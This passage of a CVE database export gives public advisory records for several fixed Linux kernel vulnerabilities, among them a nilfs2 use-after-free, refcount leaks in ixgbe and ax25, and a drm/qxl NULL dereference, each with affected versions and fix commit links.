"url": "https://git.kernel.org/stable/c/27d6dbdc6485d68075a0ebf8544d6425c1ed84bb"
},
{
"url": "https://git.kernel.org/stable/c/10aeaa47e4aa2432f29b3e5376df96d7dac5537a"
},
{
"url": "https://git.kernel.org/stable/c/688325078a8b5badd6e07ae22b27cd04e9947aec"
},
{
"url": "https://git.kernel.org/stable/c/4e8d6ac8fc9f843e940ab7389db8136634e07989"
},
{
"url": "https://git.kernel.org/stable/c/29a8d4e02fd4840028c38ceb1536cc8f82a257d4"
},
{
"url": "https://git.kernel.org/stable/c/96226fbed566f3f686f53a489a29846f2d538080"
},
{
"url": "https://git.kernel.org/stable/c/29ac1d238b3bf126af36037df80d7ecc4822341e"
},
{
"url": "https://git.kernel.org/stable/c/1be59c97c83ccd67a519d8a49486b3a8a73ca28a"
}
],
"title": "cgroup/cpuset: Prevent UAF in proc_cpuset_show()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43853",
"datePublished": "2024-08-17T09:22:10.534Z",
"dateReserved": "2024-08-17T09:11:59.277Z",
"dateUpdated": "2025-05-04T09:27:44.286Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42104 (GCVE-0-2024-42104)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: add missing check for inode numbers on directory entries
Syzbot reported that mounting and unmounting a specific pattern of
corrupted nilfs2 filesystem images causes a use-after-free of metadata
file inodes, which triggers a kernel bug in lru_add_fn().
As Jan Kara pointed out, this is because the link count of a metadata file
gets corrupted to 0, and nilfs_evict_inode(), which is called from iput(),
tries to delete that inode (ifile inode in this case).
The inconsistency occurs because directories containing the inode numbers
of these metadata files that should not be visible in the namespace are
read without checking.
Fix this issue by treating the inode numbers of these internal files as
errors in the sanity check helper when reading directory folios/pages.
Also thanks to Hillf Danton and Matthew Wilcox for their initial mm-layer
analysis.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c33c2b0d92aa1c2262d999b2598ad6fbd53bd479"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07c176e7acc5579c133bb923ab21316d192d0a95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f2fa9cf7c3537958a82fbe8c8595a5eb0861ad7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b11e8fb93ea5eefb2e4e719497ea177a58ff6131"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b7d549ed2c1fa202c751b69423a0d3a6bd5a180"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ab40870edb883b9633dc5cd55f5a2a11afa618d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/265fff1a01cdc083aeaf0d934c929db5cc64aebf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bb76c6c274683c8570ad788f79d4b875bde0e458"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42104",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:52.439171Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:46.802Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/dir.c",
"fs/nilfs2/nilfs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c33c2b0d92aa1c2262d999b2598ad6fbd53bd479",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "07c176e7acc5579c133bb923ab21316d192d0a95",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2f2fa9cf7c3537958a82fbe8c8595a5eb0861ad7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b11e8fb93ea5eefb2e4e719497ea177a58ff6131",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1b7d549ed2c1fa202c751b69423a0d3a6bd5a180",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3ab40870edb883b9633dc5cd55f5a2a11afa618d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "265fff1a01cdc083aeaf0d934c929db5cc64aebf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bb76c6c274683c8570ad788f79d4b875bde0e458",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/dir.c",
"fs/nilfs2/nilfs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: add missing check for inode numbers on directory entries\n\nSyzbot reported that mounting and unmounting a specific pattern of\ncorrupted nilfs2 filesystem images causes a use-after-free of metadata\nfile inodes, which triggers a kernel bug in lru_add_fn().\n\nAs Jan Kara pointed out, this is because the link count of a metadata file\ngets corrupted to 0, and nilfs_evict_inode(), which is called from iput(),\ntries to delete that inode (ifile inode in this case).\n\nThe inconsistency occurs because directories containing the inode numbers\nof these metadata files that should not be visible in the namespace are\nread without checking.\n\nFix this issue by treating the inode numbers of these internal files as\nerrors in the sanity check helper when reading directory folios/pages.\n\nAlso thanks to Hillf Danton and Matthew Wilcox for their initial mm-layer\nanalysis."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:23:06.233Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c33c2b0d92aa1c2262d999b2598ad6fbd53bd479"
},
{
"url": "https://git.kernel.org/stable/c/07c176e7acc5579c133bb923ab21316d192d0a95"
},
{
"url": "https://git.kernel.org/stable/c/2f2fa9cf7c3537958a82fbe8c8595a5eb0861ad7"
},
{
"url": "https://git.kernel.org/stable/c/b11e8fb93ea5eefb2e4e719497ea177a58ff6131"
},
{
"url": "https://git.kernel.org/stable/c/1b7d549ed2c1fa202c751b69423a0d3a6bd5a180"
},
{
"url": "https://git.kernel.org/stable/c/3ab40870edb883b9633dc5cd55f5a2a11afa618d"
},
{
"url": "https://git.kernel.org/stable/c/265fff1a01cdc083aeaf0d934c929db5cc64aebf"
},
{
"url": "https://git.kernel.org/stable/c/bb76c6c274683c8570ad788f79d4b875bde0e458"
}
],
"title": "nilfs2: add missing check for inode numbers on directory entries",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42104",
"datePublished": "2024-07-30T07:46:00.180Z",
"dateReserved": "2024-07-29T15:50:41.175Z",
"dateUpdated": "2025-05-04T09:23:06.233Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48896 (GCVE-0-2022-48896)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ixgbe: fix pci device refcount leak
As the comment of pci_get_domain_bus_and_slot() says, it
returns a PCI device with refcount incremented, when finish
using it, the caller must decrement the reference count by
calling pci_dev_put().
In ixgbe_get_first_secondary_devfn() and ixgbe_x550em_a_has_mii(),
pci_dev_put() is called to avoid leak.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48896",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:05.827374Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:13.189Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "53cefa802f070d46c0c518f4865be2c749818a18",
"status": "affected",
"version": "8fa10ef01260937eb540b4e9bbc3efa023595993",
"versionType": "git"
},
{
"lessThan": "112df4cd2b09acd64bcd18f5ef83ba5d07b34bf0",
"status": "affected",
"version": "8fa10ef01260937eb540b4e9bbc3efa023595993",
"versionType": "git"
},
{
"lessThan": "4c93422a54cd6a349988f42e1c6bf082cf4ea9d8",
"status": "affected",
"version": "8fa10ef01260937eb540b4e9bbc3efa023595993",
"versionType": "git"
},
{
"lessThan": "c49996c6aa03590e4ef5add8772cb6068d99fd59",
"status": "affected",
"version": "8fa10ef01260937eb540b4e9bbc3efa023595993",
"versionType": "git"
},
{
"lessThan": "b93fb4405fcb5112c5739c5349afb52ec7f15c07",
"status": "affected",
"version": "8fa10ef01260937eb540b4e9bbc3efa023595993",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.0"
},
{
"lessThan": "5.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.229",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.229",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.164",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nixgbe: fix pci device refcount leak\n\nAs the comment of pci_get_domain_bus_and_slot() says, it\nreturns a PCI device with refcount incremented, when finish\nusing it, the caller must decrement the reference count by\ncalling pci_dev_put().\n\nIn ixgbe_get_first_secondary_devfn() and ixgbe_x550em_a_has_mii(),\npci_dev_put() is called to avoid leak."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:41.423Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/53cefa802f070d46c0c518f4865be2c749818a18"
},
{
"url": "https://git.kernel.org/stable/c/112df4cd2b09acd64bcd18f5ef83ba5d07b34bf0"
},
{
"url": "https://git.kernel.org/stable/c/4c93422a54cd6a349988f42e1c6bf082cf4ea9d8"
},
{
"url": "https://git.kernel.org/stable/c/c49996c6aa03590e4ef5add8772cb6068d99fd59"
},
{
"url": "https://git.kernel.org/stable/c/b93fb4405fcb5112c5739c5349afb52ec7f15c07"
}
],
"title": "ixgbe: fix pci device refcount leak",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48896",
"datePublished": "2024-08-21T06:10:28.674Z",
"dateReserved": "2024-08-21T06:06:23.291Z",
"dateUpdated": "2025-05-04T08:25:41.423Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43829 (GCVE-0-2024-43829)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/qxl: Add check for drm_cvt_mode
Add check for the return value of drm_cvt_mode() and return the error if
it fails in order to avoid NULL pointer dereference.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1b043677d4be206c96b51811855502e50057f343 Version: 1b043677d4be206c96b51811855502e50057f343 Version: 1b043677d4be206c96b51811855502e50057f343 Version: 1b043677d4be206c96b51811855502e50057f343 Version: 1b043677d4be206c96b51811855502e50057f343 Version: 1b043677d4be206c96b51811855502e50057f343 Version: 1b043677d4be206c96b51811855502e50057f343 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43829",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:08:34.737528Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:23.928Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/qxl/qxl_display.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "62ef8d7816c8e4a6088275553818b9afc0ffaa03",
"status": "affected",
"version": "1b043677d4be206c96b51811855502e50057f343",
"versionType": "git"
},
{
"lessThan": "4e87f592a46bb804d8f833da6ce702ae4b55053f",
"status": "affected",
"version": "1b043677d4be206c96b51811855502e50057f343",
"versionType": "git"
},
{
"lessThan": "3efe34f95b1ac8c138a46b14ce75956db0d6ee7c",
"status": "affected",
"version": "1b043677d4be206c96b51811855502e50057f343",
"versionType": "git"
},
{
"lessThan": "f28b353c0c6c7831a70ccca881bf2db5e6785cdd",
"status": "affected",
"version": "1b043677d4be206c96b51811855502e50057f343",
"versionType": "git"
},
{
"lessThan": "4b1f303bdeceac049e56e4b20eb5280bd9e02f4f",
"status": "affected",
"version": "1b043677d4be206c96b51811855502e50057f343",
"versionType": "git"
},
{
"lessThan": "d4c57354a06cb4a77998ff8aa40af89eee30e07b",
"status": "affected",
"version": "1b043677d4be206c96b51811855502e50057f343",
"versionType": "git"
},
{
"lessThan": "7bd09a2db0f617377027a2bb0b9179e6959edff3",
"status": "affected",
"version": "1b043677d4be206c96b51811855502e50057f343",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/qxl/qxl_display.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/qxl: Add check for drm_cvt_mode\n\nAdd check for the return value of drm_cvt_mode() and return the error if\nit fails in order to avoid NULL pointer dereference."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:11.220Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/62ef8d7816c8e4a6088275553818b9afc0ffaa03"
},
{
"url": "https://git.kernel.org/stable/c/4e87f592a46bb804d8f833da6ce702ae4b55053f"
},
{
"url": "https://git.kernel.org/stable/c/3efe34f95b1ac8c138a46b14ce75956db0d6ee7c"
},
{
"url": "https://git.kernel.org/stable/c/f28b353c0c6c7831a70ccca881bf2db5e6785cdd"
},
{
"url": "https://git.kernel.org/stable/c/4b1f303bdeceac049e56e4b20eb5280bd9e02f4f"
},
{
"url": "https://git.kernel.org/stable/c/d4c57354a06cb4a77998ff8aa40af89eee30e07b"
},
{
"url": "https://git.kernel.org/stable/c/7bd09a2db0f617377027a2bb0b9179e6959edff3"
}
],
"title": "drm/qxl: Add check for drm_cvt_mode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43829",
"datePublished": "2024-08-17T09:21:48.239Z",
"dateReserved": "2024-08-17T09:11:59.273Z",
"dateUpdated": "2025-05-04T09:27:11.220Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38554 (GCVE-0-2024-38554)
Vulnerability from cvelistv5
Published
2024-06-19 13:35
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ax25: Fix reference count leak issue of net_device
There is a reference count leak issue of the object "net_device" in
ax25_dev_device_down(). When the ax25 device is shutting down, the
ax25_dev_device_down() drops the reference count of net_device one
or zero times depending on if we goto unlock_put or not, which will
cause memory leak.
In order to solve the above issue, decrease the reference count of
net_device after dev->ax25_ptr is set to null.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: d01ffb9eee4af165d83b08dd73ebdf9fe94a519b Version: ef0a2a0565727a48f2e36a2c461f8b1e3a61922d Version: e2b558fe507a1ed4c43db2b0057fc6e41f20a14c Version: 418993bbaafb0cd48f904ba68eeda052d624c821 Version: 5ea00fc60676c0eebfa8560ec461209d638bca9d Version: 9af0fd5c4453a44c692be0cbb3724859b75d739b |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:12:25.671Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ec437f9bbae68e9b38115c4c91de995f73f6bad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/965d940fb7414b310a22666503d2af69459c981b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8bad3a20a27be8d935f2aae08d3c6e743754944a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eef95df9b752699bddecefa851f64858247246e9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36e56b1b002bb26440403053f19f9e1a8bc075b2"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38554",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:14:44.470574Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:57.101Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ax25/ax25_dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3ec437f9bbae68e9b38115c4c91de995f73f6bad",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "965d940fb7414b310a22666503d2af69459c981b",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "8bad3a20a27be8d935f2aae08d3c6e743754944a",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "eef95df9b752699bddecefa851f64858247246e9",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"lessThan": "36e56b1b002bb26440403053f19f9e1a8bc075b2",
"status": "affected",
"version": "d01ffb9eee4af165d83b08dd73ebdf9fe94a519b",
"versionType": "git"
},
{
"status": "affected",
"version": "ef0a2a0565727a48f2e36a2c461f8b1e3a61922d",
"versionType": "git"
},
{
"status": "affected",
"version": "e2b558fe507a1ed4c43db2b0057fc6e41f20a14c",
"versionType": "git"
},
{
"status": "affected",
"version": "418993bbaafb0cd48f904ba68eeda052d624c821",
"versionType": "git"
},
{
"status": "affected",
"version": "5ea00fc60676c0eebfa8560ec461209d638bca9d",
"versionType": "git"
},
{
"status": "affected",
"version": "9af0fd5c4453a44c692be0cbb3724859b75d739b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ax25/ax25_dev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
